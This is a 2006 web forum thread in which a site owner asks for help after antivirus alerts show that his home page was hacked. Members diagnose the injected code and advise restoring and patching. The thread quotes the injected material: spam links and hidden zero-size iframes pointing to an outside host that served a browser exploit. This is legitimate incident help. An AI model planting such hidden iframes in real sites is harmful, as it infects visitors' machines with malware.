Viruses on website - help & questions

 
 
RickP

 

Posts: 665
Joined: 11/13/2004
From: Kent, U.K.
Status: offline

 
Viruses on website - help & questions - 10/16/2006 12:30:29   
Hi - it's been a while since I've posted here - no particular reason - but today I urgently need some help and advice...

A few weeks back I accessed my site from someone's PC and their virus scanner immediately blocked a virus. I wasn't sure if it related to my site or not but just a short while after it happened again! I contacted the hosts who assured me that all was clear. Today I have had a call from someone informing me that the site has several viruses - detected by their AV.

I have left a message with the hosts but am wondering if there is anything else I can do?

Here's a question first... Does this mean that my site in particular is infected or is the whole server infected and the same would be happening to all sites on that server?

Anyhow, any help, information and advice would be appreciated.

_____________________________

Regards, Rick
On-The-Web-Now!
Spooky

 

Posts: 26598
Joined: 11/11/1998
From: Middle Earth
Status: offline

 
RE: Viruses on website - help & questions - 10/16/2006 14:30:09   
Do you have any more details on the detected virus?

_____________________________

If you aren't part of the solution, then there is good money to be made prolonging the problem

§þ:)


(in reply to RickP)
jaybee

 

Posts: 14070
Joined: 10/7/2003
From: Berkshire, UK
Status: offline

 
RE: Viruses on website - help & questions - 10/16/2006 16:49:36   
Find out from all of them which AV they're using. If your host says it's clean and they're all using the same one, suspect false positives.

_____________________________

If it ain't broke..... fix it until it is.
:)

:)
GAWDS
Now where did I put that Doctype?

(in reply to Spooky)
BobbyDouglas

 

Posts: 5440
Joined: 5/15/2003
From: Arizona
Status: offline

 
RE: Viruses on website - help & questions - 10/16/2006 18:47:41   
Unix/linux web hosts don't run the normal batch of AV software that most consumers are used to.

The best thing to do is ask your host for a zip of the entire hosting account (even the stuff located below the public_html and www folders). Then use your AV to scan the zip file.

_____________________________

Arizona Web Design - Mr Bobs Web Design in Arizona
The Arizona Web Hosting Challenge

(in reply to jaybee)
RickP

 

Posts: 665
Joined: 11/13/2004
From: Kent, U.K.
Status: offline

 
RE: Viruses on website - help & questions - 10/17/2006 3:42:58   
Thanks to all for the useful replies

I've just accessed the site and my AV caught this...

The JScript/Ludvc.1ip!Trojan was detected in C:\DOCUMENTS AND SETTINGS\RICK\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\OF93A2JT\TEST[1].HTM.
Machine: MAXX, User: MAXX\Rick.
File Status: File was cured; system cure performed.


_____________________________

Regards, Rick
On-The-Web-Now!

(in reply to BobbyDouglas)
RickP

 

Posts: 665
Joined: 11/13/2004
From: Kent, U.K.
Status: offline

 
RE: Viruses on website - help & questions - 10/17/2006 3:49:38   
The home page has been hacked and the code below inserted

quote:

<a href="http://www.ivorysky.com/img/flags/10px/company_uniform.html">company uniform</a>
<a href="http://www.ivorysky.com/img/flags/10px/postal_trucks_for_sale.html">trucks for sale</a>
<a href="http://www.ivorysky.com/img/flags/10px/usmc_wwii_uniforms.html">wwii uniforms</a>
<a href="http://www.ivorysky.com/img/flags/10px/for_sale_aluma_laser.html">aluma laser</a>
<a href="http://www.ivorysky.com/img/flags/10px/bad_credit_home_purchase_loan.html">bad credit home loan</a>
<a href="http://www.ivorysky.com/img/flags/10px/terra_travel.html">terra travel</a>


Also this (which was the problem before). Warning: the links below may contain a virus.

quote:

<iframe src="http://www.isecurepages.net/out.php?s_id=1" width=0 height=0></iframe>
<iframe src="http://www.isecurepages.net/out.php?s_id=1" width=0 height=0></iframe>


< Message edited by BobbyDouglas -- 10/17/2006 9:24:50 >


_____________________________

Regards, Rick
On-The-Web-Now!

(in reply to RickP)
jaybee

 

Posts: 14070
Joined: 10/7/2003
From: Berkshire, UK
Status: offline

 
RE: Viruses on website - help & questions - 10/17/2006 5:51:25   
Looking at that and doing some checking...

The first one, ivorysky, is local to me so I could go round and break his legs for you. BUT, I don't think it's him. All the links are 404 and having checked his site it looks to me like he got hacked too and a folder of banners inserted. They've now gone. Check your site to make sure there are no new folders appearing.

The second one however is Russian. Oh surprise, surprise.

Domain Name: ISECUREPAGES.NET

Registrant:
hcenter
Petrov Vladimir Vladimirovich hcenter@list.ru
ul. Lenina, d. 20, kv.5
Moskva
Moskva,111111
RU
Tel. +7.1111111111

Now he's obviously got in via a security hole. What PHP scripts are you running?

_____________________________

If it ain't broke..... fix it until it is.
:)

:)
GAWDS
Now where did I put that Doctype?

(in reply to RickP)
BobbyDouglas

 

Posts: 5440
Joined: 5/15/2003
From: Arizona
Status: offline

 
RE: Viruses on website - help & questions - 10/17/2006 9:34:05   
Most likely a bot just scanned your website and found a very outdated script. You really won't even be able to tell that you have been hacked until you get the virus warnings. I would 1) find out how the person came in 2) correct the hole 3) revert back to a backup before you were hacked

As long as your database is displaying the correct data, then you should be able to back up the database (on the hacked site) and then restore all html/php/asp files and then use the latest database. Every case I have seen where the database still displays normal data, it has not been tampered with. You still take a chance though restoring that db.

If you are with a good host, they should help you out a bit in terms of getting everything resolved.

_____________________________

Arizona Web Design - Mr Bobs Web Design in Arizona
The Arizona Web Hosting Challenge

(in reply to jaybee)
RickP

 

Posts: 665
Joined: 11/13/2004
From: Kent, U.K.
Status: offline

 
RE: Viruses on website - help & questions - 10/17/2006 12:26:33   
Bobby...

Thanks for the sensible edit to my post - re virus warnings related to the URLs, and for the further suggestions. I wonder, would it be best to delete the entire site and just upload it again?

Jaybee...

Yes, the PHP contact form could be a weak spot (?). I spent a lot of time seeking out a 'secure' type form to use as a basis for it but I cannot properly judge as my PHP knowledge is limited to adapting pre-written scripts only. Do you know which is the 'best' script available? I notice that a lot of forms are now using a graphic with disguised numbers/letters to enter, which are not machine readable but I suppose that will only stop automated attacks but not if someone wants to abuse the form in person, so to speak.


I have some further info from my hosts...

quote:

There was a problem a few weeks ago whereby code was added to some sites on some of our servers. This was possible due to a cPanel exploit that has since been patched by cPanel...

...the virus on the web site tries to exploit a security hole in IE, the VML exploit, but this has since been patched by Microsoft...


I'm really fed up today :)


Oh, P.S. Jaybee, you're very sweet, offering to break legs and all that - not really necessary but it's a much appreciated sentiment :)

_____________________________

Regards, Rick
On-The-Web-Now!

(in reply to BobbyDouglas)
jaybee

 

Posts: 14070
Joined: 10/7/2003
From: Berkshire, UK
Status: offline

 
RE: Viruses on website - help & questions - 10/17/2006 12:42:37   
quote:

Do you know which is the 'best' script available?
It's unlikely they can get in via a form but go to the CSS Forum and there's a post on there from Mike Cherim about a secure accessible form he's been working on. You can download it all free from his site, there are great instructions on the page as well. If you get any problems I'm sure he'd be happy to hear from you.

quote:

This was possible due to a cPanel exploit that has since been patched by cPanel...
Then that is not your problem, well the aftermath is but the original hole isn't. Still go get Mike's form though. :)

My site got whacked via phpBB and along with many thousands of others, all the pages were defaced. I wiped the lot then reloaded the entire site.

quote:

a problem a few weeks ago
!!! and they didn't think to mention it! I'd get round the entire problem by getting a new host.

< Message edited by jaybee -- 10/17/2006 12:48:33 >


_____________________________

If it ain't broke..... fix it until it is.
:)

:)
GAWDS
Now where did I put that Doctype?

(in reply to RickP)
RickP

 

Posts: 665
Joined: 11/13/2004
From: Kent, U.K.
Status: offline

 
RE: Viruses on website - help & questions - 10/17/2006 12:54:11   
quote:

It's unlikely they can get in via a form


I'd like to hope so - but I'm sure they somehow use (abuse) forms for sending spam - again, not sure how but it would be great to have a truly secure form. I'll check that one out :)

_____________________________

Regards, Rick
On-The-Web-Now!

(in reply to jaybee)
RickP

 

Posts: 665
Joined: 11/13/2004
From: Kent, U.K.
Status: offline

 
RE: Viruses on website - help & questions - 10/17/2006 12:55:45   
BTW... anyone...

Are the inserted code and the virus two issues or one?

_____________________________

Regards, Rick
On-The-Web-Now!

(in reply to RickP)
BobbyDouglas

 

Posts: 5440
Joined: 5/15/2003
From: Arizona
Status: offline

 
RE: Viruses on website - help & questions - 10/17/2006 14:17:26   
Just curious, who was hosting that website for ya?

quote:

Are the inserted code and the virus two issues or one?

- Two issues. The inserted code was done via an exploit. The code then inserts an iframe that links to ANOTHER page that contains the actual virus.

_____________________________

Arizona Web Design - Mr Bobs Web Design in Arizona
The Arizona Web Hosting Challenge

(in reply to RickP)
RickP

 

Posts: 665
Joined: 11/13/2004
From: Kent, U.K.
Status: offline

 
RE: Viruses on website - help & questions - 10/18/2006 15:49:09   
quote:

Two issues. The inserted code was done via an exploit. The code then inserts an iframe that links to ANOTHER page that contains the actual virus.


Ah, I see, so the virus itself is not on my server - right?

Is the whole point just to spread a virus?

Or is the goal to raise G rankings with the links but the virus just happens to be on one of the linked sites?

If no-one sees or activates the links how can the virus come from the other site(s)? Or is the virus only on the page linked to in the iframe, which is automatically therefore activated as part of reading the iframe?

questions, questions, I know, but this would be good to know - thanks!

_____________________________

Regards, Rick
On-The-Web-Now!

(in reply to BobbyDouglas)
BobbyDouglas

 

Posts: 5440
Joined: 5/15/2003
From: Arizona
Status: offline

 
RE: Viruses on website - help & questions - 10/18/2006 23:51:28   
quote:

Ah, I see, so the virus itself is not on my server - right?

- It is most likely NOT on your actual server. There could also be viruses on your server, but the one we're talking about here is not on your server.

quote:

Is the whole point just to spread a virus?

- Yes

quote:

If no-one sees or activates the links how can the virus come from the other site(s)? Or is the virus only on the page linked to in the iframe, which is automatically therefore activated as part of reading the iframe?

- It isn't a link. Basically, you have an iframe (that was most likely inserted by an exploit), that calls on a page at another website, and that page that it is calling has the virus. The virus appears to be an IE exploit. When you try to view the source of the page, it only shows an encrypted piece of javascript.

Btw, if you are running a site that is generating income, it might be a good idea to ditch the cheap host.

_____________________________

Arizona Web Design - Mr Bobs Web Design in Arizona
The Arizona Web Hosting Challenge

(in reply to RickP)
RickP

 

Posts: 665
Joined: 11/13/2004
From: Kent, U.K.
Status: offline

 
RE: Viruses on website - help & questions - 10/19/2006 7:48:14   
Thanks Bobby, that clarifies a lot :)

_____________________________

Regards, Rick
On-The-Web-Now!

(in reply to BobbyDouglas)